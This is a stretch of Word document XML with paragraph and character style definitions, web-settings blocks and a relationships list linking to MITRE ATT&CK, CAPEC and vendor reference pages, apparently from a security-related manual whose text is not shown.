      <w:kern w:val="2"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af4">
    <w:name w:val="Hyperlink"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="00835A18"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af5">
    <w:name w:val="page number"/>
    <w:basedOn w:val="a3"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00835A18"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af6">
    <w:name w:val="Normal Indent"/>
    <w:basedOn w:val="a2"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00835A18"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:kern w:val="2"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af7">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="a3"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00835A18"/>
    <w:rPr>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af8">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="a2"/>
    <w:link w:val="af9"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00835A18"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:kern w:val="2"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af9">
    <w:name w:val="批注文字字符"/>
    <w:basedOn w:val="a3"/>
    <w:link w:val="af8"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="00835A18"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="afa">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="af8"/>
    <w:next w:val="af8"/>
    <w:link w:val="afb"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00835A18"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="afb">
    <w:name w:val="批注主题字符"/>
    <w:basedOn w:val="af9"/>
    <w:link w:val="afa"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00835A18"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="41">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="a2"/>
    <w:next w:val="a2"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BC41FF"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:spacing w:line="280" w:lineRule="exact"/>
      <w:ind w:leftChars="600" w:left="600"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorBidi"/>
      <w:kern w:val="2"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="SubItemListinTable">
    <w:name w:val="Sub Item List in Table"/>
    <w:basedOn w:val="SubItemList"/>
    <w:qFormat/>
    <w:rsid w:val="00281AF0"/>
    <w:pPr>
      <w:ind w:left="788"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ItemListtextinTable">
    <w:name w:val="Item List text inTable"/>
    <w:basedOn w:val="ItemListinTable"/>
    <w:qFormat/>
    <w:rsid w:val="003B543B"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:ind w:left="340"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Heading3NoNumber">
    <w:name w:val="Heading3 No Number"/>
    <w:basedOn w:val="3"/>
    <w:qFormat/>
    <w:rsid w:val="003B543B"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="0"/>
      </w:numPr>
    </w:pPr>
    <w:rPr>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Appendix">
    <w:name w:val="Appendix"/>
    <w:basedOn w:val="Heading1NoNumber"/>
    <w:qFormat/>
    <w:rsid w:val="00281AF0"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="5"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Glossary">
    <w:name w:val="Glossary"/>
    <w:basedOn w:val="Heading1NoNumber"/>
    <w:qFormat/>
    <w:rsid w:val="00C341F5"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Appendix2">
    <w:name w:val="Appendix2"/>
    <w:basedOn w:val="Heading2NoNumber"/>
    <w:qFormat/>
    <w:rsid w:val="00281AF0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="5"/>
      </w:numPr>
      <w:ind w:left="567"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Appendix3">
    <w:name w:val="Appendix3"/>
    <w:basedOn w:val="Heading3NoNumber"/>
    <w:qFormat/>
    <w:rsid w:val="00281AF0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="5"/>
      </w:numPr>
      <w:ind w:left="567"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="51">
    <w:name w:val="标题 5字符"/>
    <w:basedOn w:val="a3"/>
    <w:link w:val="50"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00B1637A"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial"/>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="afc">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00350861"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:jc w:val="both"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a1">
    <w:name w:val="标题五"/>
    <w:basedOn w:val="a2"/>
    <w:next w:val="11"/>
    <w:link w:val="Char"/>
    <w:qFormat/>
    <w:rsid w:val="00281AF0"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:numPr>
        <w:ilvl w:val="4"/>
        <w:numId w:val="6"/>
      </w:numPr>
      <w:spacing w:before="200" w:after="200"/>
      <w:jc w:val="both"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorBidi"/>
      <w:kern w:val="2"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="1Char">
    <w:name w:val="正文1 Char"/>
    <w:basedOn w:val="a3"/>
    <w:link w:val="11"/>
    <w:qFormat/>
    <w:rsid w:val="007A069F"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char">
    <w:name w:val="标题五 Char"/>
    <w:basedOn w:val="1Char"/>
    <w:link w:val="a1"/>
    <w:rsid w:val="00281AF0"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a0">
    <w:name w:val="List Bullet"/>
    <w:basedOn w:val="a2"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00281AF0"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:numPr>
        <w:numId w:val="7"/>
      </w:numPr>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:kern w:val="2"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="SubItemListChar">
    <w:name w:val="Sub Item List Char"/>
    <w:link w:val="SubItemList"/>
    <w:rsid w:val="005F66C0"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="13">
    <w:name w:val="不明显强调1"/>
    <w:basedOn w:val="a3"/>
    <w:uiPriority w:val="19"/>
    <w:qFormat/>
    <w:rsid w:val="00162BAC"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="52">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="a2"/>
    <w:next w:val="a2"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0035001C"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:ind w:leftChars="800" w:left="1680"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:kern w:val="2"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="6">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="a2"/>
    <w:next w:val="a2"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0035001C"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:ind w:leftChars="1000" w:left="2100"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:kern w:val="2"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="7">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="a2"/>
    <w:next w:val="a2"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0035001C"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:ind w:leftChars="1200" w:left="2520"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:kern w:val="2"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="8">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="a2"/>
    <w:next w:val="a2"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0035001C"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:ind w:leftChars="1400" w:left="2940"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:kern w:val="2"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="9">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="a2"/>
    <w:next w:val="a2"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0035001C"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:ind w:leftChars="1600" w:left="3360"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:kern w:val="2"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Itemfig">
    <w:name w:val="Item fig"/>
    <w:basedOn w:val="fig1"/>
    <w:qFormat/>
    <w:rsid w:val="009D1F69"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="atLeast"/>
      <w:ind w:leftChars="850" w:left="850"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Itemfigdes">
    <w:name w:val="Item fig des"/>
    <w:basedOn w:val="FigureDescription"/>
    <w:qFormat/>
    <w:rsid w:val="00281AF0"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="11"/>
      </w:numPr>
      <w:spacing w:before="120"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="afd">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a2"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00617CC6"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:kern w:val="2"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="afe">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a2"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="000C5C93"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:kern w:val="2"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="FAQ1">
    <w:name w:val="FAQ 1"/>
    <w:basedOn w:val="Heading1NoNumber"/>
    <w:qFormat/>
    <w:rsid w:val="00146948"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="FAQ2">
    <w:name w:val="FAQ 2"/>
    <w:basedOn w:val="Heading2NoNumber"/>
    <w:qFormat/>
    <w:rsid w:val="00146948"/>
    <w:rPr>
      <w:lang w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="tdintable">
    <w:name w:val="td in table"/>
    <w:basedOn w:val="a2"/>
    <w:qFormat/>
    <w:rsid w:val="006972C8"/>
    <w:pPr>
      <w:snapToGrid w:val="0"/>
      <w:spacing w:line="240" w:lineRule="atLeast"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:snapToGrid w:val="0"/>
      <w:spacing w:val="-1"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="stepintable">
    <w:name w:val="step in table"/>
    <w:basedOn w:val="ItemListinTable"/>
    <w:qFormat/>
    <w:rsid w:val="00074FFA"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="10"/>
      </w:numPr>
      <w:jc w:val="left"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="stepresultintable">
    <w:name w:val="stepresult in table"/>
    <w:basedOn w:val="ItemListtextinTable"/>
    <w:qFormat/>
    <w:rsid w:val="002777C4"/>
    <w:pPr>
      <w:ind w:left="1021"/>
      <w:jc w:val="left"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="infointable">
    <w:name w:val="info in table"/>
    <w:basedOn w:val="ItemListtextinTable"/>
    <w:qFormat/>
    <w:rsid w:val="00074FFA"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:ind w:left="425"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="h5">
    <w:name w:val="h5"/>
    <w:basedOn w:val="a3"/>
    <w:rsid w:val="000F2665"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="high-light-bg4">
    <w:name w:val="high-light-bg4"/>
    <w:basedOn w:val="a3"/>
    <w:rsid w:val="000F2665"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="scite-citeref-number">
    <w:name w:val="scite-citeref-number"/>
    <w:basedOn w:val="a3"/>
    <w:rsid w:val="000F2665"/>
  </w:style>
  <w:style w:type="character" w:styleId="aff">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="a3"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000F2665"/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTML">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="a3"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="000F2665"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aff0">
    <w:name w:val="Revision"/>
    <w:hidden/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="000F2665"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="aff1">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a3"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="000F2665"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="aff2">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="a3"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="000F2665"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ts-alignment-element">
    <w:name w:val="ts-alignment-element"/>
    <w:basedOn w:val="a3"/>
    <w:rsid w:val="000F2665"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ts-alignment-element-highlighted">
    <w:name w:val="ts-alignment-element-highlighted"/>
    <w:basedOn w:val="a3"/>
    <w:rsid w:val="000F2665"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="s1">
    <w:name w:val="s1"/>
    <w:basedOn w:val="a3"/>
    <w:rsid w:val="000F2665"/>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"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7978">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="658389412">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="775370322">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1338967960">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="192780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hyperlink" Target="https://www2.cybereason.com/research-osx-pirrit-mac-os-x-secuirty" TargetMode="External"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://capec.mitre.org/data/definitions/571.html" TargetMode="External"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://capec.mitre.org/data/definitions/93.html" TargetMode="External"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1086" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://capec.mitre.org/data/definitions/270.html" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1036" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1042" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1038" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://capec.mitre.org/data/definitions/203.html" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://man7.org/linux/man-pages/man2/setuid.2.html" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1018" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/library/ms537359.aspx" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1038" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1024" TargetMode="External"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://capec.mitre.org/data/definitions/575.html" TargetMode="External"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1028" TargetMode="External"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1030" TargetMode="External"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1031" TargetMode="External"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1030" TargetMode="External"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1027" TargetMode="External"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/library/windows/desktop/ms721766.aspx" TargetMode="External"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://capec.mitre.org/data/definitions/576.html" TargetMode="External"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://capec.mitre.org/data/definitions/573.html" TargetMode="External"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0057" TargetMode="External"/><Relationship Id="rId260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://capec.mitre.org/data/definitions/227.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1042/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1187/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1031/" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1017/" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1086/" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1026" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1051" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1036" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1032" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1027" TargetMode="External"/><Relationship Id="rId261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://capec.mitre.org/data/definitions/131.html" TargetMode="External"/><Relationship Id="rId262" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://capec.mitre.org/data/definitions/130.html" TargetMode="External"/><Relationship Id="rId263" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://capec.mitre.org/data/definitions/125.html" TargetMode="External"/><Relationship Id="rId264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1037" TargetMode="External"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1086" TargetMode="External"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0106" TargetMode="External"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0193" TargetMode="External"/><Relationship Id="rId113" 